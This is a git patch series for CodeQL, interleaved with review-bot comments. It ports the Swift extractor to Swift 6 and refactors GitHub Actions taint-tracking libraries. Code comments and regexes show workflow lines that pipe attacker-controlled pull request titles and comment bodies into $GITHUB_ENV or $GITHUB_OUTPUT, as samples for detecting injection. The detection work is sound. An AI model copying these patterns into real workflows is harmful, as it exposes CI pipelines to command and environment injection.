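Review bot: The added `LOG_INFO("> {}", input.getFileName());` in the input loop of `collectInputFilenames` reads like a debugging aid rather than part of the Swift 6 port. It emits one info-level line per input, including inputs that the following `if` then rejects, and the bare `> ` prefix does not say what is being listed. Either drop it or log only the accepted files at a lower verbosity, e.g. inside the `if` as `LOG_DEBUG("collected input file {}", input.getFileName());`. The function body continues outside the hunk.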
@@ -175,6 +175,8 @@ MAP(swift::Expr, ExprTag) MAP(swift::LinearFunctionExtractOriginalExpr, LinearFunctionExtractOriginalExprTag) MAP(swift::LinearToDifferentiableFunctionExpr, LinearToDifferentiableFunctionExprTag) MAP(swift::ABISafeConversionExpr, AbiSafeConversionExprTag) // different acronym convention + MAP(swift::ActorIsolationErasureExpr, void) // TODO swift 6.0 + MAP(swift::UnreachableExpr, void) // TODO swift 6.0 MAP(swift::ExplicitCastExpr, ExplicitCastExprTag) MAP(swift::CheckedCastExpr, CheckedCastExprTag) MAP(swift::ForcedCheckedCastExpr, ForcedCheckedCastExprTag) @@ -200,7 +202,8 @@ MAP(swift::Expr, ExprTag) MAP(swift::ConsumeExpr, ConsumeExprTag) MAP(swift::MaterializePackExpr, MaterializePackExprTag) MAP(swift::SingleValueStmtExpr, SingleValueStmtExprTag) - + MAP(swift::ExtractFunctionIsolationExpr, void) // TODO swift 6.0 + MAP(swift::CurrentContextIsolationExpr, void) // TODO swift 6.0 MAP(swift::Decl, DeclTag) MAP(swift::ValueDecl, ValueDeclTag) MAP(swift::TypeDecl, TypeDeclTag) @@ -332,6 +335,7 @@ MAP(swift::TypeBase, TypeTag) MAP(swift::PackExpansionType, PackExpansionTypeTag) MAP(swift::PackElementType, PackElementTypeTag) MAP(swift::TypeVariableType, void) // created during type checking and only used for constraint checking + MAP(swift::ErrorUnionType, void) // TODO swift 6.0 MAP(swift::SugarType, SugarTypeTag) MAP(swift::ParenType, ParenTypeTag) MAP(swift::TypeAliasType, TypeAliasTypeTag) diff --git a/swift/extractor/translators/ExprTranslator.cpp b/swift/extractor/translators/ExprTranslator.cpp index ce8da08a12e..cfdc7d8fae0 100644 --- a/swift/extractor/translators/ExprTranslator.cpp +++ b/swift/extractor/translators/ExprTranslator.cpp 
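Review bot: The new `MAP(swift::ActorIsolationErasureExpr, void) // TODO swift 6.0` and `MAP(swift::UnreachableExpr, void)` entries carry a TODO that does not say what remains to be done; the same applies to `ExtractFunctionIsolationExpr`, `CurrentContextIsolationExpr` and `ErrorUnionType` in the two later hunks of this file. Judging by the existing `TypeVariableType` line, `void` appears to mean the node gets no tag, so code using these Swift 6 constructs would presumably be absent from the extracted database and invisible to queries. A comment such as `// TODO swift 6.0: not extracted yet, needs a schema class and translator` would make the coverage gap explicit. The second hunk also deletes the blank line that separated the `Expr` entries from `MAP(swift::Decl, DeclTag)`, which looks unintentional.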
@@ -378,7 +378,7 @@ codeql::KeyPathExpr ExprTranslator::translateKeyPathExpr(const swift::KeyPathExp for (const auto& component : expr.getComponents()) { entry.components.push_back(emitKeyPathComponent(component)); } - if (auto rootTypeRepr = expr.getRootType()) { + if (auto rootTypeRepr = expr.getExplicitRootType()) { auto keyPathType = expr.getType()->getAs(); CODEQL_EXPECT_OR(return entry, keyPathType, "KeyPathExpr must have BoundGenericClassType"); auto keyPathTypeArgs = keyPathType->getGenericArgs(); diff --git a/swift/third_party/load.bzl b/swift/third_party/load.bzl index f9f46e5f410..a893b59d2dc 100644 --- a/swift/third_party/load.bzl +++ b/swift/third_party/load.bzl @@ -1,11 +1,10 @@ load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive") load("@bazel_tools//tools/build_defs/repo:utils.bzl", "maybe") -_swift_prebuilt_version = "swift-5.10.1-RELEASE.323" +_swift_prebuilt_version = "swift-6.0.1-RELEASE.330" _swift_sha_map = { - "Linux-X64": "29c7c53ab2f438e85daecdb4567173c78ac32afc45753d7277d744aed515229d", - "macOS-ARM64": "e697f423c8abcb8a942246489fd4f8ce71472119510b64b2073eaeaec86b771e", - "macOS-X64": "faef29334e8615e8a71263c7453ebc7e566d6f2928d827675f6faae233c544a6", + "Linux-X64": "3da9b257b08da3bed023656c3bea2e1d0e6504b1592f593a077023c59e5339fc", + "macOS-X64": "66641b3b285e593342b88d48defa6668b15a85603acfe5aba5b62b9ed9123465", } _swift_arch_map = { From 6a99845ecf46a81ae2a27d26c0ff76afb79e2994 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 10 Oct 2024 22:22:56 +0200 Subject: [PATCH 0572/1267] Remove old code to handle redirections to GITHUB_ENV Redirections to GITHUB_ENV are better handled now by the Bash module ---- --- .../actions/dataflow/internal/DataFlowPrivate.qll | 15 --------------- 1 file changed, 15 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 3226e41ba2f..4e4f580f070 100644 
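Review bot: In `swift/third_party/load.bzl` the `"macOS-ARM64"` checksum is removed from `_swift_sha_map` while the version moves to `swift-6.0.1-RELEASE.330`, and no replacement hash is added. How the map is consumed is outside the hunk, so confirm that an architecture without an entry fails the lookup loudly rather than producing an `http_archive` with no `sha256`, which would fetch the prebuilt toolchain unverified. If Apple-silicon builds are meant to keep working, add the pinned hash, `"macOS-ARM64": "<sha256 of the 6.0.1 macOS-ARM64 archive>",`. If the platform is dropped on purpose, say so in a comment above the map and remove it from `_swift_arch_map` if it is listed there.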
--- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -266,21 +266,6 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { madSource(nodeFrom, _, "env." + astTo.getFieldName()) or astTo.getTarget() = astFrom - or - // e.g: - // - run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV - // - run: echo ${{ env.ISSUE_KEY }} - exists(Run run, string script, Expression expr, string line, string key, string value | - run.getScript() = script and - run.getAnScriptExpr() = expr and - line = script.splitAt("\n") and - key = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 1) and - value = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 2) and - value.indexOf(expr.getRawExpression()) > 0 and - key = astTo.getFieldName() and - expr = astFrom and - expr.getEnclosingWorkflow() = run.getEnclosingWorkflow() - ) ) ) } From 898507eb5488325c3569ecf984163bf948ba3874 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 11 Oct 2024 12:17:35 +0200 Subject: [PATCH 0573/1267] Update publish.yml --- .github/workflows/publish.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml index bfe87d1056c..67a428233e2 100644 --- a/.github/workflows/publish.yml +++ b/.github/workflows/publish.yml @@ -13,7 +13,6 @@ jobs: GITHUB_TOKEN: ${{ github.token }} run: | gh extension install github/gh-codeql - gh codeql set-channel "nightly" gh codeql version printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}" gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}" From d4a24dfdd15d66486194380f33f1cc15af581365 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 11 Oct 2024 12:19:22 +0200 Subject: [PATCH 0574/1267] Refactor FlowSteps --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 326 +++--------------- ql/lib/codeql/actions/dataflow/TaintSteps.qll | 101 ++++++ .../dataflow/internal/DataFlowPrivate.qll | 6 +- .../internal/TaintTrackingPrivate.qll | 2 +- 4 files changed, 161 insertions(+), 274 deletions(-) create mode 100644 ql/lib/codeql/actions/dataflow/TaintSteps.qll diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index f43d1bdcd87..b0d98d2e659 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
@@ -3,120 +3,8 @@ */ private import actions -private import codeql.util.Unit private import codeql.actions.DataFlow private import codeql.actions.dataflow.FlowSources -private import codeql.actions.dataflow.ExternalFlow -private import codeql.actions.security.ArtifactPoisoningQuery -private import codeql.actions.security.OutputClobberingQuery -private import codeql.actions.security.UntrustedCheckoutQuery - -/** - * A unit class for adding additional taint steps. - * - * Extend this class to add additional taint steps that should apply to all - * taint configurations. - */ -class AdditionalTaintStep extends Unit { - /** - * Holds if the step from `node1` to `node2` should be considered a taint - * step for all configurations. - */ - abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); -} - -/** - * Holds if and environment variable is used, directly or indirectly, in a Run's step expression. - * Where the expression is a string captured from the Run's script. - */ -bindingset[var_name, expr] -predicate envToRunExpr(string var_name, Run run, string expr) { - // e.g. echo "FOO=$BODY" >> $GITHUB_ENV - // e.g. echo "FOO=${BODY}" >> $GITHUB_ENV - expr.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - // e.g. echo "FOO=$(echo $BODY)" >> $GITHUB_ENV - expr.matches("$(echo %") and expr.indexOf(var_name) > 0 - or - // e.g. - // FOO=$(echo $BODY) - // echo "FOO=$FOO" >> $GITHUB_ENV - exists(string line, string var2_name, string var2_value | run.getScript().splitAt("\n") = line | - var2_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var2_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and - var2_value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") and - ( - expr.matches("%$" + ["", "{", "ENV{"] + var2_name + "%") - or - expr.matches("$(echo %") and expr.indexOf(var2_name) > 0 - ) - ) -} - -/** - * Holds if an environment variable is used, directly or indirectly, as an argument to a dangerous command - * in a Run step. 
- * Where the command is a string captured from the Run's script. - */ -bindingset[var_name] -predicate envToArgInjSink(string var_name, Run run, string command) { - exists(string argument, string line, string regexp, int command_group, int argument_group | - run.getScript().splitAt("\n") = line and - argumentInjectionSinksDataModel(regexp, command_group, argument_group) and - argument = line.regexpCapture(regexp, argument_group) and - command = line.regexpCapture(regexp, command_group) and - envToRunExpr(var_name, run, argument) and - exists(run.getInScopeEnvVarExpr(var_name)) - ) -} - -/** - * Holds if an env var is passed to a Run step and this Run step, writes its value to a special workflow file. - * - file is the name of the special workflow file: GITHUB_ENV, GITHUB_OUTPUT, GITHUB_PATH - * - var_name is the name of the env var - * - run is the Run step - * - key is the name assigned in the special workflow file. - * e.g. FOO for `echo "FOO=$BODY" >> $GITHUB_ENV` - * e.g. FOO for `echo "FOO=$(echo $BODY)" >> $GITHUB_OUTPUT` - * e.g. path (special name) for `echo "$BODY" >> $GITHUB_PATH` - */ -bindingset[var_name] -predicate envToSpecialFile(string file, string var_name, Run run, string key) { - exists(string value | - ( - file = "GITHUB_ENV" and - run.getAWriteToGitHubEnv(key, value) - or - file = "GITHUB_OUTPUT" and - run.getAWriteToGitHubOutput(key, value) - or - file = "GITHUB_PATH" and - run.getAWriteToGitHubPath(value) and - key = "path" - ) and - envToRunExpr(var_name, run, value) - ) -} - -/** - * Holds if a Run step declares an environment variable, uses it in its script to set another env var. - * e.g. 
- * env: - * BODY: ${{ github.event.comment.body }} - * run: | - * echo "foo=$(echo $BODY)" >> $GITHUB_ENV - */ -predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(Run run, string var_name | - run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and - succ.asExpr() = run.getScriptScalar() and - ( - envToSpecialFile(["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"], var_name, run, _) or - envToArgInjSink(var_name, run, _) or - exists(OutputClobberingSink n | n.asExpr() = run.getScriptScalar()) - ) - ) -} /** * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script. 
@@ -132,37 +20,61 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { * echo "::set-output name=step-output::$BODY" */ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string var_name, string key | - run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and + exists(Run run, string var, string field | + run.getInScopeEnvVarExpr(var) = pred.asExpr() and succ.asExpr() = run and - envToSpecialFile("GITHUB_OUTPUT", var_name, run, key) and - c = any(DataFlow::FieldContent ct | ct.getName() = key) + Bash::envReachingGitHubFileWrite(run, var, "GITHUB_OUTPUT", field) and + c = any(DataFlow::FieldContent ct | ct.getName() = field) ) } predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string var_name, string key, string value | - run.getAWriteToGitHubEnv(key, value) and - c = any(DataFlow::FieldContent ct | ct.getName() = key) and - pred.asExpr() = run.getInScopeEnvVarExpr(var_name) and + exists( + Run run, string var, string field //string key, string value | + | + run.getInScopeEnvVarExpr(var) = pred.asExpr() and // we store the taint on the enclosing job since the may not exist an implicit env attribute succ.asExpr() = run.getEnclosingJob() and - Bash::isBashParameterExpansion(value, var_name, _, _) + Bash::envReachingGitHubFileWrite(run, var, "GITHUB_ENV", field) and + c = any(DataFlow::FieldContent ct | ct.getName() = field) //and ) } -predicate controlledCWD(Step artifact) { - artifact instanceof UntrustedArtifactDownloadStep or - // This shoould be: - // artifact instanceof PRHeadCheckoutStep - // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error - // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround - // instead of using ActionsMutableRefCheckout and ActionsSHACheckout - artifact.(Uses).getCallee() = "actions/checkout" or - artifact 
instanceof GitMutableRefCheckout or - artifact instanceof GitSHACheckout or - artifact instanceof GhMutableRefCheckout or - artifact instanceof GhSHACheckout +/** + * A command whose output gets assigned to an environment variable or step output. + * - run: | + * echo "foo=$(cmd)" >> "$GITHUB_OUTPUT" + * - run: | + * foo=$(> "$GITHUB_OUTPUT" + */ +predicate commandToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(CommandSource source, Run run, string key, string cmd | + source.getCommand() = cmd and + Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_OUTPUT", key) and + c = any(DataFlow::FieldContent ct | ct.getName() = key) and + pred.asExpr() = run.getScriptScalar() and + succ.asExpr() = run + ) +} + +/** + * A command whose output gets assigned to an environment variable or step output. + * - run: | + * echo "foo=$(cmd)" >> "$GITHUB_ENV" + * - run: | + * foo=$(> "$GITHUB_ENV" + */ +predicate commandToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(CommandSource source, Run run, string key, string cmd | + source.getCommand() = cmd and + Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", key) and + c = any(DataFlow::FieldContent ct | ct.getName() = key) and + pred.asExpr() = run.getScriptScalar() and + // we store the taint on the enclosing job since there may not be an implicit env attribute + succ.asExpr() = run.getEnclosingJob() + ) } /** 
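Review bot: In the new `commandToOutputStoreStep` and `commandToEnvStoreStep`, the `CommandSource source` is bound only through `source.getCommand() = cmd`; nothing ties it to `run` or to `pred`. As written, a command string that is a source in one Run would, it seems, also enable the store step in any other Run whose script writes the output of an identical command to `GITHUB_OUTPUT` or `GITHUB_ENV`, which can attribute taint to the wrong step. Adding `source.getEnclosingRun() = run and` (the accessor declared on `CommandSource`) to both predicates would pin the step to the Run that contains the source. Separately, `envToEnvStoreStep` keeps the commented-out fragments `//string key, string value |` and `//and`. Both new doc comments also carry the same sentence, so the `GITHUB_ENV` variant should state that it stores on the enclosing job.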
@@ -173,28 +85,12 @@ predicate controlledCWD(Step artifact) { * foo=$(> "$GITHUB_ENV" */ -predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string key, string value, Step artifact | - controlledCWD(artifact) and - ( - // A file is read and its content is assigned to an env var - // - run: | - // foo=$(> "$GITHUB_ENV" - exists(string var_name, string file_read | - run.getAnAssignment(var_name, file_read) and - Bash::outputsPartialFileContent(run, file_read) and - envToRunExpr(var_name, run, value) and - run.getAWriteToGitHubEnv(key, value) - ) - or - // A file is read and its content is assigned to an output - // - run: echo "foo=$(> "$GITHUB_ENV" - run.getAWriteToGitHubEnv(key, value) and - Bash::outputsPartialFileContent(run, value) - ) and +predicate fileToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(FileSource source, Run run, string key, string cmd | + source.asExpr().(Step).getAFollowingStep() = run and + Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", key) and + Bash::outputsPartialFileContent(run, cmd) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and - artifact.getAFollowingStep() = run and pred.asExpr() = run.getScriptScalar() and // we store the taint on the enclosing job since there may not be an implicit env attribute succ.asExpr() = run.getEnclosingJob() ) } - -/** - * A download artifact step followed by a step that may use downloaded artifacts. - */ -predicate artifactDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(Step artifact, Run run | - controlledCWD(artifact) and - pred.asExpr() = artifact and - succ.asExpr() = run.getScriptScalar() and - artifact.getAFollowingStep() = run - ) -} - -// -/** - * A download artifact step followed by a uses step . 
- */ -predicate artifactDownloadToUsesStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(Step artifact, Uses uses | - controlledCWD(artifact) and - pred.asExpr() = artifact and - succ.asExpr() = uses and - artifact.getAFollowingStep() = uses - ) -} - -/** - * A read of the _files field of the dorny/paths-filter action. - */ -predicate dornyPathsFilterTaintStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(StepsExpression o | - pred instanceof DornyPathsFilterSource and - o.getStepId() = pred.asExpr().(UsesStep).getId() and - o.getFieldName().matches("%_files") and - succ.asExpr() = o - ) -} - -/** - * A read of user-controlled field of the tj-actions/changed-files action. - */ -predicate tjActionsChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(StepsExpression o | - pred instanceof TJActionsChangedFilesSource and - o.getTarget() = pred.asExpr() and - o.getStepId() = pred.asExpr().(UsesStep).getId() and - o.getFieldName() = - [ - "added_files", "copied_files", "deleted_files", "modified_files", "renamed_files", - "all_old_new_renamed_files", "type_changed_files", "unmerged_files", "unknown_files", - "all_changed_and_modified_files", "all_changed_files", "other_changed_files", - "all_modified_files", "other_modified_files", "other_deleted_files", "modified_keys", - "changed_keys" - ] and - succ.asExpr() = o - ) -} - -/** - * A read of user-controlled field of the tj-actions/verify-changed-files action. - */ -predicate tjActionsVerifyChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(StepsExpression o | - pred instanceof TJActionsVerifyChangedFilesSource and - o.getTarget() = pred.asExpr() and - o.getStepId() = pred.asExpr().(UsesStep).getId() and - o.getFieldName() = "changed_files" and - succ.asExpr() = o - ) -} - -/** - * A read of user-controlled field of the xt0rted/slash-command-action action. 
- */ -predicate xt0rtedSlashCommandActionTaintStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(StepsExpression o | - pred instanceof Xt0rtedSlashCommandSource and - o.getTarget() = pred.asExpr() and - o.getStepId() = pred.asExpr().(UsesStep).getId() and - o.getFieldName() = "command-arguments" and - succ.asExpr() = o - ) -} - -class TaintSteps extends AdditionalTaintStep { - override predicate step(DataFlow::Node node1, DataFlow::Node node2) { - envToRunStep(node1, node2) or - artifactDownloadToRunStep(node1, node2) or - artifactDownloadToUsesStep(node1, node2) or - // 3rd party actions - dornyPathsFilterTaintStep(node1, node2) or - tjActionsChangedFilesTaintStep(node1, node2) or - tjActionsVerifyChangedFilesTaintStep(node1, node2) or - xt0rtedSlashCommandActionTaintStep(node1, node2) - } -} diff --git a/ql/lib/codeql/actions/dataflow/TaintSteps.qll b/ql/lib/codeql/actions/dataflow/TaintSteps.qll new file mode 100644 index 00000000000..de64a0dd6f4 --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/TaintSteps.qll 
@@ -0,0 +1,101 @@ +/** + * Provides classes representing various flow steps for taint tracking. + */ + +private import actions +private import codeql.util.Unit +private import codeql.actions.DataFlow +private import codeql.actions.dataflow.FlowSources + +/** + * A unit class for adding additional taint steps. + * + * Extend this class to add additional taint steps that should apply to all + * taint configurations. + */ +class AdditionalTaintStep extends Unit { + /** + * Holds if the step from `node1` to `node2` should be considered a taint + * step for all configurations. + */ + abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); +} + +/** + * A download artifact step followed by a step that may use downloaded artifacts. + */ +predicate fileDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(FileSource source, Run run | + pred = source and + source.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScriptScalar() and + Bash::outputsPartialFileContent(run, run.getACommand()) + ) +} + +/** + * A read of the _files field of the dorny/paths-filter action. + */ +predicate dornyPathsFilterTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof DornyPathsFilterSource and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName().matches("%_files") and + succ.asExpr() = o + ) +} + +/** + * A read of user-controlled field of the tj-actions/changed-files action. 
+ */ +predicate tjActionsChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof TJActionsChangedFilesSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName() = + [ + "added_files", "copied_files", "deleted_files", "modified_files", "renamed_files", + "all_old_new_renamed_files", "type_changed_files", "unmerged_files", "unknown_files", + "all_changed_and_modified_files", "all_changed_files", "other_changed_files", + "all_modified_files", "other_modified_files", "other_deleted_files", "modified_keys", + "changed_keys" + ] and + succ.asExpr() = o + ) +} + +/** + * A read of user-controlled field of the tj-actions/verify-changed-files action. + */ +predicate tjActionsVerifyChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof TJActionsVerifyChangedFilesSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName() = "changed_files" and + succ.asExpr() = o + ) +} + +/** + * A read of user-controlled field of the xt0rted/slash-command-action action. + */ +predicate xt0rtedSlashCommandActionTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof Xt0rtedSlashCommandSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName() = "command-arguments" and + succ.asExpr() = o + ) +} + +class TaintSteps extends AdditionalTaintStep { + override predicate step(DataFlow::Node node1, DataFlow::Node node2) { + dornyPathsFilterTaintStep(node1, node2) or + tjActionsChangedFilesTaintStep(node1, node2) or + tjActionsVerifyChangedFilesTaintStep(node1, node2) or + xt0rtedSlashCommandActionTaintStep(node1, node2) + } +} 
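Review bot: `fileDownloadToRunStep` is defined in this new file but is not listed in `TaintSteps.step`, whereas the `TaintSteps` class removed from `FlowSteps.qll` in this commit registered `artifactDownloadToRunStep`, `artifactDownloadToUsesStep` and `envToRunStep`. Unless individual queries add the predicate as their own extra step, flows from an untrusted checkout or artifact download into a later `run:` script would no longer be followed by default, which would show up as missed results rather than as an error. If leaving it out is intended, a line in its doc comment such as `Not part of TaintSteps; queries opt in explicitly.` would record that; otherwise add `fileDownloadToRunStep(node1, node2) or` to the override. Its doc comment also still describes any following step, while the body now requires `Bash::outputsPartialFileContent(run, run.getACommand())`.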
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 4e4f580f070..d7c3dad9ee7 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -351,8 +351,10 @@ predicate storeStep(Node node1, ContentSet c, Node node2) { madStoreStep(node1, node2, c) or envToOutputStoreStep(node1, node2, c) or envToEnvStoreStep(node1, node2, c) or - artifactToOutputStoreStep(node1, node2, c) or - artifactToEnvStoreStep(node1, node2, c) + fileToOutputStoreStep(node1, node2, c) or + fileToEnvStoreStep(node1, node2, c) or + commandToOutputStoreStep(node1, node2, c) or + commandToEnvStoreStep(node1, node2, c) } /** diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll index b8647339d24..2dde5203576 100644 --- a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll @@ -5,7 +5,7 @@ private import DataFlowPrivate private import codeql.actions.DataFlow -private import codeql.actions.dataflow.FlowSteps +private import codeql.actions.dataflow.TaintSteps private import codeql.actions.Ast /** From d558ff80c3a63fa113a0befa2d09334c48d8e64f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 11 Oct 2024 12:20:03 +0200 Subject: [PATCH 0575/1267] New Command sources for git and GITHUB_EVENT_PATH --- ql/lib/codeql/actions/config/Config.qll | 10 ++ .../actions/config/ConfigExtensions.qll | 5 + .../codeql/actions/dataflow/FlowSources.qll | 109 +++++++++++++++++- ql/lib/ext/config/untrusted_git_commands.yml | 32 +++++ 4 files changed, 153 insertions(+), 3 deletions(-) create mode 100644 ql/lib/ext/config/untrusted_git_commands.yml 
diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index e298865c468..e3bf239565e 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -128,3 +128,13 @@ predicate vulnerableActionsDataModel( ) { Extensions::vulnerableActionsDataModel(action, vulnerable_version, vulnerable_sha, fixed_version) } + +/** + * MaD models for untrusted git commands + * Fields: + * - cmd_regex: Regular expression for matching untrusted git commands + * - flag: Flag for the command + */ +predicate untrustedGitCommandsDataModel(string cmd_regex, string flag) { + Extensions::untrustedGitCommandsDataModel(cmd_regex, flag) +} diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/ql/lib/codeql/actions/config/ConfigExtensions.qll index cc1b5553f5f..a32e9c445f2 100644 --- a/ql/lib/codeql/actions/config/ConfigExtensions.qll +++ b/ql/lib/codeql/actions/config/ConfigExtensions.qll @@ -57,3 +57,8 @@ extensible predicate argumentInjectionSinksDataModel( extensible predicate vulnerableActionsDataModel( string action, string vulnerable_version, string vulnerable_sha, string fixed_version ); + +/** + * Holds for git commands that may introduce untrusted data when called on an attacker controlled branch. + */ +extensible predicate untrustedGitCommandsDataModel(string cmd_regex, string flag); diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 4682e7b1abf..f1fb2073ed0 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
@@ -64,6 +64,88 @@ class GitHubEventCtxSource extends RemoteFlowSource { override string getSourceType() { result = flag } } +abstract class CommandSource extends RemoteFlowSource { + abstract string getCommand(); + + abstract Run getEnclosingRun(); +} + +class GitCommandSource extends RemoteFlowSource, CommandSource { + Run run; + string cmd; + string flag; + + GitCommandSource() { + exists(Step checkout, string cmd_regex | + // This shoould be: + // source instanceof PRHeadCheckoutStep + // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error + // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround + // instead of using ActionsMutableRefCheckout and ActionsSHACheckout + ( + exists(Uses uses | + checkout = uses and + uses.getCallee() = "actions/checkout" and + exists(uses.getArgument("ref")) + ) + or + checkout instanceof GitMutableRefCheckout + or + checkout instanceof GitSHACheckout + or + checkout instanceof GhMutableRefCheckout + or + checkout instanceof GhSHACheckout + ) and + this.asExpr() = run.getScriptScalar() and + checkout.getAFollowingStep() = run and + run.getACommand() = cmd and + cmd.indexOf("git") = 0 and + untrustedGitCommandsDataModel(cmd_regex, flag) and + cmd.regexpMatch(cmd_regex) + ) + } + + override string getSourceType() { result = flag } + + override string getCommand() { result = cmd } + + override Run getEnclosingRun() { result = run } +} + +class GitHubEventPathSource extends RemoteFlowSource, CommandSource { + string cmd; + string flag; + string access_path; + Run run; + + // Examples + // COMMENT_AUTHOR=$(jq -r .comment.user.login "$GITHUB_EVENT_PATH") + // CURRENT_COMMENT=$(jq -r .comment.body "$GITHUB_EVENT_PATH") + // PR_HEAD=$(jq --raw-output .pull_request.head.ref ${GITHUB_EVENT_PATH}) + // PR_NUMBER=$(jq --raw-output .pull_request.number ${GITHUB_EVENT_PATH}) + // PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) + // BODY=$(jq -r 
